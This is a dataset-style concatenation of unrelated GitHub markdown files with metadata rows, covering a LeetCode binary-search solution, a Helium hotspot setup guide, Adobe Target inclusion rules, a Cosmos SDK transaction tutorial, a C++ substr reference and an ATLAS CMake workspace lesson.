3. Skonfiguruj potok zawartości obrazu, aby wygenerować wstępnie przemnożone znaki alfa. Na stronie **Ogólne** potoku zawartości obrazu właściwości konfiguracji ustaw właściwość Konwertuj na wstępnie pomnożony format alfa na wartość > > **Tak (/generatepremultipliedalpha).**
4. Wybierz przycisk **OK.**
Podczas kompilowania projektu potok zawartości obrazu konwertuje obraz źródłowy z formatu roboczego na określony format danych wyjściowych — obejmuje to konwersję obrazu na wstępnie przemnożonego formatu alfa — a wynik jest kopiowany do katalogu wyjściowego projektu. | 85.346154 | 591 | 0.821541 | pol_Latn | 0.999964 |
9a6621ef23c4211bdc548878c5816b5b5d766157 | 1,369 | md | Markdown | dream/0035.md | hippieZhou/The-Way-Of-LeetCode | c63d777e01413726b6214c616c20c61f8e5b330b | [
"MIT"
] | null | null | null | dream/0035.md | hippieZhou/The-Way-Of-LeetCode | c63d777e01413726b6214c616c20c61f8e5b330b | [
"MIT"
] | null | null | null | dream/0035.md | hippieZhou/The-Way-Of-LeetCode | c63d777e01413726b6214c616c20c61f8e5b330b | [
"MIT"
] | null | null | null | # search-insert-position
```bash
给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。如果目标值不存在于数组中,返回它将会被按顺序插入的位置。
你可以假设数组中无重复元素。
示例 1:
输入: [1,3,5,6], 5
输出: 2
示例 2:
输入: [1,3,5,6], 2
输出: 1
示例 3:
输入: [1,3,5,6], 7
输出: 4
示例 4:
输入: [1,3,5,6], 0
输出: 0
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/search-insert-position
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
```
```C#
public class Solution
{
public int SearchInsert(int[] nums, int target)
{
var index = nums.ToList().BinarySearch(target);
return index >= 0 ? index : -(index + 1);
// return index >= 0 ? index : ~index; C# 7.0
}
}
```
```C#
public class Solution
{
public int SearchInsert(int[] nums, int target)
{
var left = 0;
var right = nums.Length - 1;
while (left <= right)
{
var mid = left + (right - left) / 2;
if (nums[mid] == target)
{
return mid;
}
else if (nums[mid] < target)
{
left = mid + 1;
}
else
{
right = mid - 1;
}
}
return left;
}
}
```
```python
class Solution:
def searchInsert(self, nums: list, target: int) -> int:
for i, val in enumerate(nums):
if target <= val:
return i
return len(nums)
``` | 17.779221 | 60 | 0.495982 | eng_Latn | 0.22874 |
9a663256a6dd181d65996a9c048b5a9bbe0378c6 | 3,936 | md | Markdown | docs/indoor-hotspot/quick-start.md | orlandoow/Helium-Guides | 710c9701af83acd7d3c8e746673a5b1fa4aa1b49 | [
"MIT"
] | null | null | null | docs/indoor-hotspot/quick-start.md | orlandoow/Helium-Guides | 710c9701af83acd7d3c8e746673a5b1fa4aa1b49 | [
"MIT"
] | null | null | null | docs/indoor-hotspot/quick-start.md | orlandoow/Helium-Guides | 710c9701af83acd7d3c8e746673a5b1fa4aa1b49 | [
"MIT"
] | null | null | null | # Indoor Hotspot Quick Start Guide
## Box Contents
Your Nebra Indoor Helium Hotspot comes with the following items:
* The Nebra Helium Indoor Hotspot
* RP-SMA LoRa Antenna
* Worldwide 12V 1.5A Power Adapter
* 1M CAT5 Ethernet Cable
## Warnings
Please remember to follow the following steps when using your Nebra Indoor Hotspot.
* Never power on the Indoor hotspot without it's antenna connected as this may damage the unit.
* Do not place in direct sunlight or on hot surfaces (e.g a Heater).
* The Indoor unit's case is designed to be used indoors, and is not suitable for use outside.
## Preparing Your Nebra Indoor Hotspot
**Step 1:** First screw in the included antenna into the connector on the back of the hotspot.
**Step 2:** Next find a suitable location for your Hotspot to be positioned, to provide the best coverage we recommend placing it near a window just out of direct sunlight. You’ll need to be near a mains power source too.
**Step 3:** If you are using a wired Ethernet connection, connect an Ethernet cable between a router or switch and the Ethernet jack on the Hotspot.
**Step 4:** Fit the appropriate power plug for your country onto the universal power supply and plug it into a mains outlet.
**Step 5:** Finally connect the DC Jack from the power supply into the power receptacle on the Hotspot.
You should then see the lower LED on the back of the unit turn on, the hotspot will now take up to 5 minutes to configure for it’s first boot.
The upper light will turn on when it is ready to continue for configuration.
If you have connected it to a wired Ethernet connection this process may take slightly longer as it’ll also perform firmware updates as soon as it gets a connection to the internet.
## Configuring Your Nebra Indoor Hotspot
To configure your Hotspot you will require the Helium Network application installed on a Mobile Phone and for you to have gone through the account setup process to continue.
**Step 1:** Open the Helium application and login, then press hotspots.
**Step 2:** Next click Set up Hotspot , from here you will want to select Nebra Indoor Hotspot.

**Step 3:** After following the steps on the App to get to this page, Push the button on the back of the unit once to enable pairing and then press scan on the App.

**Step 5:** Press the entry for your hotspot in the app, you can check it is the correct one by matching the last 6 characters shown in the application with the last 6 characters of the mac address printed on the sticker on the bottom of the hotspot.

**Step 6:** The app will show the available Wi-Fi networks within range of your Hotspot.

**If you are using Ethernet,** tap Use Ethernet Instead and skip to Step 7.
**If using Wi-Fi,** tap on the name of your Wi-Fi network on the app which will bring you to the following screen.

Type in your Wi-Fi's network password then tap Connect and it should connect to your wi-fi network.
**Step 7:** The app will then ask for you to set your hotspot's location.

**Step 8:** Finally you can confirm the location of your hotspot. Click continue and you should be presented with a map to then place where your hotspot is on the app.

**Step 9:** The setup should now be complete, it'll submit the details of the Hotspot to the Helium network and then in approximately 15 minutes confirm it's added to the network.

| 50.461538 | 250 | 0.757622 | eng_Latn | 0.998005 |
9a6756736dff762753e86441dfafc0e4f35d4620 | 11,705 | md | Markdown | help/c-recommendations/c-algorithms/use-dynamic-and-static-inclusion-rules.md | isabella232/target.en | c95904678086f685614ad17f06001f2c93089a21 | [
"MIT"
] | null | null | null | help/c-recommendations/c-algorithms/use-dynamic-and-static-inclusion-rules.md | isabella232/target.en | c95904678086f685614ad17f06001f2c93089a21 | [
"MIT"
] | 1 | 2021-02-23T13:19:43.000Z | 2021-02-23T16:39:38.000Z | help/c-recommendations/c-algorithms/use-dynamic-and-static-inclusion-rules.md | isabella232/target.en | c95904678086f685614ad17f06001f2c93089a21 | [
"MIT"
] | null | null | null | ---
keywords: inclusion rules;inclusion criteria;recommendations;create new criteria;promotion;promotions;dynamic filtering;dynamic;empty values;ignore filtering rule;static filter;filter by value;entity attribute matching;profile attribute matching;parameter matching;filter by value;static filter
description: Information about creating inclusion rules in Adobe Target Recommendations for criteria and promotions, and adding additional dynamic or static filtering rules to achieve better results.
title: Use dynamic and static inclusion rules in Adobe Target Recommendations
feature: criteria
mini-toc-levels: 3
uuid: f0ee2086-1126-44a4-9379-aa897dc0e06b
---
#  Use dynamic and static inclusion rules{#use-dynamic-and-static-inclusion-rules}
Information about creating inclusion rules for criteria and promotions in Adobe Target, and adding additional dynamic or static filtering rules to achieve better results for your recommendations.
The process for creating and using inclusion rules for criteria and promotions is similar, as are the use cases and examples. Both criteria and promotions and the use of inclusion rules are covered in this topic.
## Adding Filtering Rules to Criteria {#section_CD0D74B8D3BE4A75A78C36CF24A8C57F}
While you are [creating criteria](../../c-recommendations/c-algorithms/create-new-algorithm.md#task_8A9CB465F28D44899F69F38AD27352FE), click **[!UICONTROL Add Filtering Rule]** under **[!UICONTROL Inclusion Rules]**.

The available options vary depending on the selected industry vertical and recommendation key.
## Adding Filtering Rules to Promotions {#section_D59AFB62E2EE423086281CF5D18B1076}
While [creating a promotion](../../c-recommendations/t-create-recs-activity/adding-promotions.md#task_CC5BD28C364742218C1ACAF0D45E0E14), select **[!UICONTROL Promote by Attribute]**, then click **[!UICONTROL Add Filtering Rule]**.

## Filter Types {#section_0125F1ED10A84C0EB45325122460EBCD}
The following table lists the types of filtering options for both criteria and promotions:
### Dynamic Filtering
The following options are available for dynamic filtering:
#### Entity Attribute Matching
Filter dynamically by comparing a pool of potential recommendations items to a specific item that the users has interacted with.
For example, only recommend items that match the current item’s brand.
Available operators:
* equals
* does not equal
* is between
* contains
* does not contain
* starts with
* ends with
* value is present
* value is not present
* is greater than or equal to
* is less than or equal to
#### Profile Attribute Matching
Filter dynamically by comparing items (entities) against a value in the user's profile.
For example, only recommend items that match the visitor’s favorite brand.
Available operators:
* equals
* does not equal
* contains
* does not contain
* starts with
* ends with
* is greater than or equal to
* is less than or equal to
* is between
#### Parameter Matching
Filter dynamically by comparing items (entities) against a value in the request (API or mbox).
For example, only recommend content that matches the "industry" page parameter.
Important: If the activity was created before October 31, 2016, its delivery will fail if it uses the "Parameter Matching" filter. To work around this problem:
* Create a new activity and add your criteria in it.
* Use a criteria that does not contain the "Parameter Matching" filter.
* Remove the "Parameter Matching" filter from your criteria.
Available operators:
* equals
* does not equal
* contains
* does not contain
* starts with
* ends with
* is greater than or equal to
* is less than or equal to
* is between
### Filter by Value
The following option is available for dynamic filtering:
#### Static Filter
Manually enter one or more static values to filter.
For example, only recommend content with an MPAA rating of "G" or "PG."
Available operators:
* equals
* does not equal
* contains
* does not contain
* starts with
* ends with
* value is present
* value is not present
* is greater than or equal to
* is less than or equal to
>[!NOTE]
>
>If you are familiar with how inclusion rules were configured prior to the Target 17.6.1 release (June 2017), you'll notice that some of the options and operators have changed. Only those operators applicable to the selected option display and some operators were renamed ("matches" is now "equals") to be more consistent and intuitive. All existing exclusion rules created prior to this release were automatically migrated into the new structure. No restructuring is necessary on your part.
You can create as many inclusion rules as necessary. The inclusion rules are joined with an AND operator. All rules must be met to include an item in a recommendation.
## Dynamic criteria and promotion examples
Dynamic criteria and promotions are much more powerful than static criteria and promotions, and yield better results and engagement.
The following examples will give you ideas about how you can use dynamic promotions in your marketing efforts:
### Equals
Using the "equals" operator in dynamic promotions, when a visitor is viewing an item on your website (such as a product, article, or movie), you can promote other items from:
* the same brand
* the same category
* the same category AND from the house brand
* the same store
### Does Not Equal
Using the "does not equal" operator in dynamic promotions, when a visitor is viewing an item on your website (such as a product, article, or movie), you can promote other items from:
* a different TV series
* a different genre
* a different product series
* a different style ID
### Is Between
Using the "is between" operator in dynamic promotions, when a visitor is viewing an item on your website (such as a product, article, or movie), you can promote other items that are:
* more expensive
* less expensive
* cost plus or minus 30%
* later episodes in the same season
* prior books in a series
## Handling empty values when filtering by Entity Attribute Matching, Profile Attribute Matching, and Parameter Matching {#section_7D30E04116DB47BEA6FF840A3424A4C8}
You can choose several options to handle empty values when filtering by [!UICONTROL Entity Attribute Matching], [!UICONTROL Profile Attribute Matching], and [!UICONTROL Parameter Matching] for exit criteria and promotions.
Previously, no results were returned if a value was empty. The "If *x* is Empty" drop-down list lets you choose the appropriate action to perform if the criteria has empty values, as shown in the following illustration:

To select the desired action, hover over the gear icon (), then choose the desired action:
| Action | Available For | Details |
|--- |--- |--- |
|Ignore this filtering rule|Profile Attribute Matching<br>Parameter Matching|This is the default action for Profile Attribute Matching and Parameter Matching.<br>This option specifies that the rule is ignored. For example, if there are three filtering rules and the third rule doesn't pass any values, instead of not returning any results, you can simply ignore the third rule with the empty values.|
|Do not promote any items|Entity Attribute Matching<br>Profile Attribute Matching<br>Parameter Matching|This is the default action for Entity Attribute Matching.<br>This action is how [!DNL Target] handled empty values before the addition of this option: no results will be shown for this criteria.|
|Use a static value|Entity Attribute Matching<br>Profile Attribute Matching<br>Parameter Matching|If a value is empty, you can choose to use a static value.|
## Profile Attribute Matching Examples {#section_9873E2F22E094E479569D05AD5BB1D40}
[!UICONTROL Profile Attribute Matching] allows you to recommend only the items that match an attribute from the visitor's profile, as in the examples below.
### Example 1: Recommending items from the user's favorite brand
For example, you can use the [!UICONTROL Profile Attribute Matching] option to create a rule that recommends items only where the brand equals the value or text stored in `profile.favoritebrand`. With such a rule, if a visitor is looking at running shorts from a particular brand, only recommendations will display that match that user's favorite brand (the value stored in `profile.favoritebrand` in the visitor's profile).
```
Profile Attribute Matching
brand - equals - the value/text stored in - profile.favoritebrand
```
### Example 2: Matching jobs to job seekers
Suppose that you're trying to match jobs to job seekers. You want to recommend only jobs that are in the same city as the job seeker.
You can use inclusion rules to match a job seeker's location from his or her visitor's profile to a job listing, as in the following example:
```
Profile Attribute Matching
jobCity - equals - the value/text stored in - profile.usersCity
```
## Entity Attribute Matching Examples
[!UICONTROL Entity Attribute Matching] allows you to recommend only the items that match an attribute from the item the user is currently viewing, the item the user most recently viewed, the item the user most recently purchased, the item the user most frequently viewed, or from an item stored in a custom attribute in the visitor's profile, as in the examples below.
### Example 3: Upselling to a more expensive product
Suppose that you're an apparel retailer and want to encourage users to consider higher-priced and, therefore, more profitable items. You can use the "equals" and "is between" operators to promote more expensive items that are from the same category and the same brand. For example, a shoe retailer can promote more expensive running shoes in an effort to up-sell a visitor looking at running shoes.
```
Entity Attribute Matching
category - equals - current item's - category
And
Entity Attribute Matching
brand - equals - current item's - brand
And
Entity Attribute Matching
value - is between - 100% and 1000% of - current item's - value
```
### Example 4: Promoting private-label products
You can mix dynamic and static filters to promote private-label products. For example, an office supply company can promote toner cartridges of the company's house brand to drive a more profitable sale for a visitor looking at toner -- and promote pens of the company's house brand to drive a more profitable sale for a visitor looking at pens.
```
Entity Attribute Matching
category - equals - current item's - category
And
Static Filter
IsHouseBrand - equals - true
```
## Caveats {#section_A889FAF794B7458CA074DEE06DD0E345}
>[!IMPORTANT]
>
>Different data type attributes might not be compatible in dynamic criteria or promotions during runtime with the "equals" and "does not equal" operators. You should use [!UICONTROL Value], [!UICONTROL Margin], [!UICONTROL Inventory], and [!UICONTROL Environment] values wisely on the right hand side if the left hand side has predefined attributes or custom attributes.

The following table shows effective rules and rules that might not be compatible during runtime:
| Compatible Rules | Potentially Incompatible Rules |
|--- |--- |
|value - is between - 90% and 110% of current item's - salesValue|salesValue - is between - 90% and 110% of current item's - value|
|value - is between - 90% and 110% of current item's - value|clearancePrice - is between - 90% and 110% of current item's - margin|
|margin - is between - 90% and 110% of current item's - margin|storeInventory - equals - current item's - inventory|
|inventory - equals - current item's - inventory||
| 46.82 | 491 | 0.783084 | eng_Latn | 0.998662 |
9a689cca608cbda1d40a632e9e13379007a8c82c | 10,313 | md | Markdown | docs/sdk/core/app2.md | fansciecode/sentinel | cc777d57fac091de75bfbe1134c9bba3da765b1c | [
"Apache-2.0"
] | null | null | null | docs/sdk/core/app2.md | fansciecode/sentinel | cc777d57fac091de75bfbe1134c9bba3da765b1c | [
"Apache-2.0"
] | 50 | 2020-09-01T16:46:54.000Z | 2021-04-22T03:19:11.000Z | docs/sdk/core/app2.md | fansciecode/sentinel | cc777d57fac091de75bfbe1134c9bba3da765b1c | [
"Apache-2.0"
] | null | null | null | # Transactions
In the previous app we built a simple bank with one message type `send` for sending
coins and one store for storing accounts.
Here we build `App2`, which expands on `App1` by introducing
- a new message type for issuing new coins
- a new store for coin metadata (like who can issue coins)
- a requirement that transactions include valid signatures
Along the way, we'll be introduced to Amino for encoding and decoding
transactions and to the AnteHandler for processing them.
The complete code can be found in [app2.go](examples/app2.go).
## Message
Let's introduce a new message type for issuing coins:
```go
// MsgIssue to allow a registered issuer
// to issue new coins.
type MsgIssue struct {
Issuer sdk.AccAddress
Receiver sdk.AccAddress
Coin sdk.Coin
}
// Implements Msg.
func (msg MsgIssue) Type() string { return "issue" }
```
Note the `Type()` method returns `"issue"`, so this message is of a different
type and will be executed by a different handler than `MsgSend`. The other
methods for `MsgIssue` are similar to `MsgSend`.
## Handler
We'll need a new handler to support the new message type. It just checks if the
sender of the `MsgIssue` is the correct issuer for the given coin type, as per the information
in the issuer store:
```go
// Handle MsgIssue
func handleMsgIssue(keyIssue *sdk.KVStoreKey, keyAcc *sdk.KVStoreKey) sdk.Handler {
return func(ctx sdk.Context, msg sdk.Msg) sdk.Result {
issueMsg, ok := msg.(MsgIssue)
if !ok {
return sdk.NewError(2, 1, "MsgIssue is malformed").Result()
}
// Retrieve stores
issueStore := ctx.KVStore(keyIssue)
accStore := ctx.KVStore(keyAcc)
// Handle updating coin info
if res := handleIssuer(issueStore, issueMsg.Issuer, issueMsg.Coin); !res.IsOK() {
return res
}
// Issue coins to receiver using previously defined handleTo function
if res := handleTo(accStore, issueMsg.Receiver, []sdk.Coin{issueMsg.Coin}); !res.IsOK() {
return res
}
return sdk.Result{
// Return result with Issue msg tags
Tags: issueMsg.Tags(),
}
}
}
func handleIssuer(store sdk.KVStore, issuer sdk.AccAddress, coin sdk.Coin) sdk.Result {
// the issuer address is stored directly under the coin denomination
denom := []byte(coin.Denom)
infoBytes := store.Get(denom)
if infoBytes == nil {
return sdk.ErrInvalidCoins(fmt.Sprintf("Unknown coin type %s", coin.Denom)).Result()
}
var coinInfo coinInfo
err := json.Unmarshal(infoBytes, &coinInfo)
if err != nil {
return sdk.ErrInternal("Error when deserializing coinInfo").Result()
}
// Msg Issuer is not authorized to issue these coins
if !bytes.Equal(coinInfo.Issuer, issuer) {
return sdk.ErrUnauthorized(fmt.Sprintf("Msg Issuer cannot issue tokens: %s", coin.Denom)).Result()
}
return sdk.Result{}
}
// coinInfo stores meta data about a coin
type coinInfo struct {
Issuer sdk.AccAddress `json:"issuer"`
}
```
Note we've introduced the `coinInfo` type to store the issuer address for each coin.
We JSON serialize this type and store it directly under the denomination in the
issuer store. We could of course add more fields and logic around this,
like including the current supply of coins in existence, and enforcing a maximum supply,
but that's left as an excercise for the reader :).
## Amino
Now that we have two implementations of `Msg`, we won't know before hand
which type is contained in a serialized `Tx`. Ideally, we would use the
`Msg` interface inside our `Tx` implementation, but the JSON decoder can't
decode into interface types. In fact, there's no standard way to unmarshal
into interfaces in Go. This is one of the primary reasons we built
[Amino](https://github.com/tendermint/go-amino) :).
While SDK developers can encode transactions and state objects however they
like, Amino is the recommended format. The goal of Amino is to improve over the latest version of Protocol Buffers,
`proto3`. To that end, Amino is compatible with the subset of `proto3` that
excludes the `oneof` keyword.
While `oneof` provides union types, Amino aims to provide interfaces.
The main difference being that with union types, you have to know all the types
up front. But anyone can implement an interface type whenever and however
they like.
To implement interface types, Amino allows any concrete implementation of an
interface to register a globally unique name that is carried along whenever the
type is serialized. This allows Amino to seamlessly deserialize into interface
types!
The primary use for Amino in the SDK is for messages that implement the
`Msg` interface. By registering each message with a distinct name, they are each
given a distinct Amino prefix, allowing them to be easily distinguished in
transactions.
Amino can also be used for persistent storage of interfaces.
To use Amino, simply create a codec, and then register types:
```
func NewCodec() *wire.Codec {
cdc := wire.NewCodec()
cdc.RegisterInterface((*sdk.Msg)(nil), nil)
cdc.RegisterConcrete(MsgSend{}, "example/MsgSend", nil)
cdc.RegisterConcrete(MsgIssue{}, "example/MsgIssue", nil)
crypto.RegisterAmino(cdc)
return cdc
}
```
Note: We also register the types in the `tendermint/tendermint/crypto` module so that `crypto.PubKey`
is encoded/decoded correctly.
Amino supports encoding and decoding in both a binary and JSON format.
See the [codec API docs](https://godoc.org/github.com/tendermint/go-amino#Codec) for more details.
## Tx
Now that we're using Amino, we can embed the `Msg` interface directly in our
`Tx`. We can also add a public key and a signature for authentication.
```go
// Simple tx to wrap the Msg.
type app2Tx struct {
sdk.Msg
PubKey crypto.PubKey
Signature []byte
}
// This tx only has one Msg.
func (tx app2Tx) GetMsgs() []sdk.Msg {
return []sdk.Msg{tx.Msg}
}
// Amino decode app2Tx. Capable of decoding both MsgSend and MsgIssue
func tx2Decoder(cdc *wire.Codec) sdk.TxDecoder {
return func(txBytes []byte) (sdk.Tx, sdk.Error) {
var tx app2Tx
err := cdc.UnmarshalBinary(txBytes, &tx)
if err != nil {
return nil, sdk.ErrTxDecode(err.Error())
}
return tx, nil
}
}
```
## AnteHandler
Now that we have an implementation of `Tx` that includes more than just the Msg,
we need to specify how that extra information is validated and processed. This
is the role of the `AnteHandler`. The word `ante` here denotes "before", as the
`AnteHandler` is run before a `Handler`. While an app can have many Handlers,
one for each set of messages, it can have only a single `AnteHandler` that
corresponds to its single implementation of `Tx`.
The AnteHandler resembles a Handler:
```go
type AnteHandler func(ctx Context, tx Tx) (newCtx Context, result Result, abort bool)
```
Like Handler, AnteHandler takes a Context that restricts its access to stores
according to whatever capability keys it was granted. Instead of a `Msg`,
however, it takes a `Tx`.
Like Handler, AnteHandler returns a `Result` type, but it also returns a new
`Context` and an `abort bool`.
For `App2`, we simply check if the PubKey matches the Address, and the Signature validates with the PubKey:
```go
// Simple anteHandler that ensures msg signers have signed.
// Provides no replay protection.
func antehandler(ctx sdk.Context, tx sdk.Tx) (_ sdk.Context, _ sdk.Result, abort bool) {
appTx, ok := tx.(app2Tx)
if !ok {
// set abort boolean to true so that we don't continue to process failed tx
return ctx, sdk.ErrTxDecode("Tx must be of format app2Tx").Result(), true
}
// expect only one msg and one signer in app2Tx
msg := tx.GetMsgs()[0]
signerAddr := msg.GetSigners()[0]
signBytes := msg.GetSignBytes()
sig := appTx.GetSignature()
// check that submitted pubkey belongs to required address
if !bytes.Equal(appTx.PubKey.Address(), signerAddr) {
return ctx, sdk.ErrUnauthorized("Provided Pubkey does not match required address").Result(), true
}
// check that signature is over expected signBytes
if !appTx.PubKey.VerifyBytes(signBytes, sig) {
return ctx, sdk.ErrUnauthorized("Signature verification failed").Result(), true
}
// authentication passed, app to continue processing by sending msg to handler
return ctx, sdk.Result{}, false
}
```
## App2
Let's put it all together now to get App2:
```go
func NewApp2(logger log.Logger, db dbm.DB) *bapp.BaseApp {
cdc := NewCodec()
// Create the base application object.
app := bapp.NewBaseApp(app2Name, logger, db, txDecoder(cdc))
// Create a key for accessing the account store.
keyAccount := sdk.NewKVStoreKey("acc")
// Create a key for accessing the issue store.
keyIssue := sdk.NewKVStoreKey("issue")
// set antehandler function
app.SetAnteHandler(antehandler)
// Register message routes.
// Note the handler gets access to the account store.
app.Router().
AddRoute("send", handleMsgSend(keyAccount)).
AddRoute("issue", handleMsgIssue(keyAccount, keyIssue))
// Mount stores and load the latest state.
app.MountStoresIAVL(keyAccount, keyIssue)
err := app.LoadLatestVersion(keyAccount)
if err != nil {
cmn.Exit(err.Error())
}
return app
}
```
The main difference here, compared to `App1`, is that we use a second capability
key for a second store that is *only* passed to a second handler, the
`handleMsgIssue`. The first `handleMsgSend` has no access to this second store and cannot read or write to
it, ensuring a strong separation of concerns.
Note now that we're using Amino, we create a codec, register our types on the codec, and pass the
codec into our TxDecoder constructor, `tx2Decoder`. The SDK takes care of the rest for us!
## Conclusion
We've expanded on our first app by adding a new message type for issuing coins,
and by checking signatures. We learned how to use Amino for decoding into
interface types, allowing us to support multiple Msg types, and we learned how
to use the AnteHandler to validate transactions.
Unfortunately, our application is still insecure, because any valid transaction
can be replayed multiple times to drain someones account! Besides, validating
signatures and preventing replays aren't things developers should have to think
about.
In the next section, we introduce the built-in SDK modules `auth` and `bank`,
which respectively provide secure implementations for all our transaction authentication
and coin transfering needs.
| 33.483766 | 115 | 0.748376 | eng_Latn | 0.981215 |
9a68a490e1fb2a53d9234b47f05114fc1028a9f9 | 1,880 | md | Markdown | content/post/2012-02-08-thinking-out-loud-is-a-dvfabric-closer-than-we-think.md | scottslowe/weblog | dcf9c6a5d0a8d9b7fb507ce7b6fcee1b11eb065f | [
"MIT"
] | 9 | 2018-12-19T09:50:28.000Z | 2022-03-31T00:40:39.000Z | content/post/2012-02-08-thinking-out-loud-is-a-dvfabric-closer-than-we-think.md | scottslowe/weblog | dcf9c6a5d0a8d9b7fb507ce7b6fcee1b11eb065f | [
"MIT"
] | 2 | 2018-04-23T13:45:38.000Z | 2020-01-24T23:04:16.000Z | content/post/2012-02-08-thinking-out-loud-is-a-dvfabric-closer-than-we-think.md | scottslowe/weblog | dcf9c6a5d0a8d9b7fb507ce7b6fcee1b11eb065f | [
"MIT"
] | 9 | 2018-04-22T05:43:46.000Z | 2022-03-02T20:28:45.000Z | ---
author: slowe
categories: Musing
comments: true
date: 2012-02-08T16:42:41Z
slug: thinking-out-loud-is-a-dvfabric-closer-than-we-think
tags:
- FCoE
- FibreChannel
- Storage
- Virtualization
- Networking
- ToL
title: 'Thinking Out Loud: Is A dvFabric Closer Than We Think?'
url: /2012/02/08/thinking-out-loud-is-a-dvfabric-closer-than-we-think/
wordpress_id: 2533
---
This is a short post, but one that I hope will stir some discussion.
Earlier this evening, I read Maish's blog post titled [My Wish for dvFabric---a dvSwitch for Storage](http://technodrone.blogspot.com/2012/02/my-wish-for-dvfabric-dvswitch-for.html). In that blog post Maish describes a self-configuring storage fabric that would simplify how we provision storage in a vSphere environment. Here's how Maish describes the dvFabric:
>So how do I envision this dvFabric? Essentially the same as a dvSwitch. A logical entity to which I attach my network cards (for iSCSI/NFS) or my HBAs (for FcoE or FC). I define which uplink goes to which storage, what the multi-pathing policy is for this uplink, how many ports should be used, what is the failover policy for which NIC, which NFS volumes to mount, which LUNS to add I gather you see what I am getting at.
It's a pretty interesting idea, and one with a great deal of merit. So here's the "Thinking Out Loud" part: is Target Driven Zoning (or Peer Zoning) the answer to a large part of Maish's dvFabric?
If you don't know what Target Driven Zoning (TDZ) or Peer Zoning are, I recommend you go have a look at Erik Smith's [introductory blog post on Target Driven Zoning](http://brasstacksblog.typepad.com/brass-tacks/2012/01/introducing-target-driven-zoning-tdz.html). Based on Erik's description of TDZ, it certainly seems like it could be used to help on the block side of the house with Maish's dvFabric idea.
So what do you think---am I way off here?
| 62.666667 | 424 | 0.77234 | eng_Latn | 0.987695 |
9a69960f4ed1bfe8a880f0b129e66619d7b4a9ea | 1,593 | md | Markdown | md/C++ Reference/string/235.md | kev0960/ModooCode | aae17e3be86da2f39bf93d7a91364b2a6a348525 | [
"Apache-2.0"
] | 39 | 2019-02-26T08:21:06.000Z | 2022-03-24T06:38:25.000Z | md/C++ Reference/string/235.md | kev0960/ModooCode | aae17e3be86da2f39bf93d7a91364b2a6a348525 | [
"Apache-2.0"
] | 9 | 2019-03-01T05:07:44.000Z | 2022-02-21T07:39:11.000Z | md/C++ Reference/string/235.md | kev0960/ModooCode | aae17e3be86da2f39bf93d7a91364b2a6a348525 | [
"Apache-2.0"
] | 5 | 2021-02-08T05:52:01.000Z | 2022-03-08T06:37:34.000Z | ----------------
title : C++ 레퍼런스 - string 의 substr 함수
cat_title : substr
ref_title : substr, basic_string::substr
path : /C++ Reference/string
----------------
##@ cpp-ref-start
#@ substr
```cpp-formatted
basic_string substr(size_type pos = 0, size_type count = npos) const;
```
문자열의 일부를 리턴한다.
문자열의 `pos` 번째 문자 부터 `count` 길이 만큼의 문자열을 리턴한다. 만약에, 인자로 전달된 부분 문자열의 길이가 문자열 보다 길다면, 그 이상을 반환하지 않고 문자열의 끝 까지만 리턴한다.
또한, `count` 로 `npos` 를 전달한다면, 자동으로 `pos` 부터 원래 문자열의 끝 까지 리턴한다.
### 인자
* `pos` : 첫번째 문자의 위치 (원래 문자열에서)
* `count` : 부분 문자열의 길이
### 리턴값
원래 문자열에서 `[pos, pos + count)` 까지의 문자열을 반환한다.
### 예외
만일 `pos` 가 원래 문자열의 길이보다 길다면 `std::out_of_range` 예외를 발생시킨다.
### 시간 복잡도
요청한 부분 문자열의 길이 (`count`) 에 비례한다.
### 예시
```cpp-formatted
#include <iostream>
#include <string>
int main() {
std::string a = "0123456789abcdefghij";
// count 가 npos 이므로 pos 부터 문자열 끝까지 리턴한다.
std::string sub1 = a.substr(10);
std::cout << sub1 << '\n';
// pos 와 pos + count 모두 문자열 범위 안이므로, 해당하는 부분 문자열을
// 리턴한다.
std::string sub2 = a.substr(5, 3);
std::cout << sub2 << '\n';
// pos 는 문자열 범위 안이지만, pos+count 는 밖이므로, pos 부터 문자열 끝까지
// 리턴한다.
std::string sub4 = a.substr(a.size() - 3, 50);
std::cout << sub4 << '\n';
try {
// pos 가 문자열 범위 밖이므로 예외를 발생시킴.
std::string sub5 = a.substr(a.size() + 3, 50);
std::cout << sub5 << '\n';
} catch (const std::out_of_range& e) {
std::cout << "pos exceeds string size\n";
}
}
```
실행 결과
```exec
abcdefghij
567
hij
pos exceeds string size
```
### 참고 자료
* `copy` : 문자를 복사한다.
* `size` : 문자열의 길이를 리턴한다.
* `find` : 문자열에서 원하는 문자열을 찾는다. | 18.523256 | 113 | 0.592593 | kor_Hang | 0.999985 |
9a69981d1d58190eb84120cfecb50549d61f00f4 | 6,055 | md | Markdown | _episodes/02-workspace.md | kkrizka/atlas-cmake | b1b532c334953c3e5ed6cc15e545d9a5e3778744 | [
"CC-BY-4.0"
] | 1 | 2020-08-07T18:29:07.000Z | 2020-08-07T18:29:07.000Z | _episodes/02-workspace.md | kkrizka/atlas-cmake | b1b532c334953c3e5ed6cc15e545d9a5e3778744 | [
"CC-BY-4.0"
] | null | null | null | _episodes/02-workspace.md | kkrizka/atlas-cmake | b1b532c334953c3e5ed6cc15e545d9a5e3778744 | [
"CC-BY-4.0"
] | 1 | 2020-08-07T18:24:16.000Z | 2020-08-07T18:24:16.000Z | ---
title: "Your Workspace"
teaching: 20
exercises: 20
questions:
- "How should I organize my code?"
objectives:
- "Learn about the standard structure for an ATLAS workspace."
keypoints:
- "Use three directories: `source/` for code, `build/` for binaries and `run/` for output."
---
# The Structure
When working on your analysis, you will most likely be editing, compiling and running code from several packages. There is a recommended way to organize your code. The structure is as follows:
- `source/`: Place all your packages here, one per directory.
- `source/CMakeLists.txt`: The top-level `CMakeLists.txt` file loading all of the ATLAS infrastructure and finding all of your packages.
- `build/`: Compiled binaries.
- `run/`: Place to run your analysis from (ie: where the results will be placed).
This is only a recommendation. You can take other approaches, if you like. For example, I like to append the release version to the `build` directory name. This allows me to easily revert back to an older releases, in case I want to understand a change.
> ## Multiple Build Directories
>
> What feature of CMake allows you to have multiple build directories?
>
> > ## Solution
> >
> > This is an advantage of the `out-of-source` builds used in CMake. You can separate your source code from the binaries, allowing you to have several variations on the compiler in parallel.
> {: .solution}
{: .challenge}
# Transitioning Your Current Project
At the end of the last day, you should be left with the following structure.
~~~shell
ls
~~~
{: .language-bash}
~~~
AnalysisPayload.cxx CMakeLists.txt JetSelectionHelper/ README.md
~~~
{: .output}
Our goal is to convert it into the structure similar to the one outline above. We will do this using git command, meaning that your whole change history will remain intact.
